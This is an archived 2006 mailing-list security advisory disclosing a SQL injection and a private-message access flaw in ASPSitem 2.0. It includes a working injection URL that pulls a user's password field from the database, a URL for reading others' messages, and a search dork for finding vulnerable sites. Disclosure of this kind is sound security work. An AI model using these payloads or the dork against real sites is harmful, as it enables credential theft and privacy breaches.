[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.
- To: submit@xxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.
- From: Mustafa Can Bjorn IPEKCI <nukedx@xxxxxxxxxx>
- Date: Sun, 28 May 2006 17:06:20 +0300
--Security Report--
Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 08:26 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@xxxxxxxxxx
Web: http://www.nukedx.com
}
---
Vendor: ASPSitem (http://www.aspsitem.com)
Version: 2.0 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL
queries to bid parameter in Anket.asp.
Remote attacker also can read others private messages.The parameter id
in Hesabim.asp did not sanitized properly
for checking the owner status of private message.
Level: Critical
---
How&Example:
SQL injection ->
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
EXAMPLE ->
http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20
id%20like%201
with this example remote attacker can leak userid 1's login
information from database.
Read others private messages ->
GET/EXAMPLE ->
http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
* 27/05/2006: Vendor already released patch for SQL injection you can
find it here: http://www.aspsitem.com/Forum.asp?forum=oku&msgid=44710
--
Exploit: http://www.nukedx.com/?getxpl=39
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
---
Dorks: "Teşekkür ASPSitem"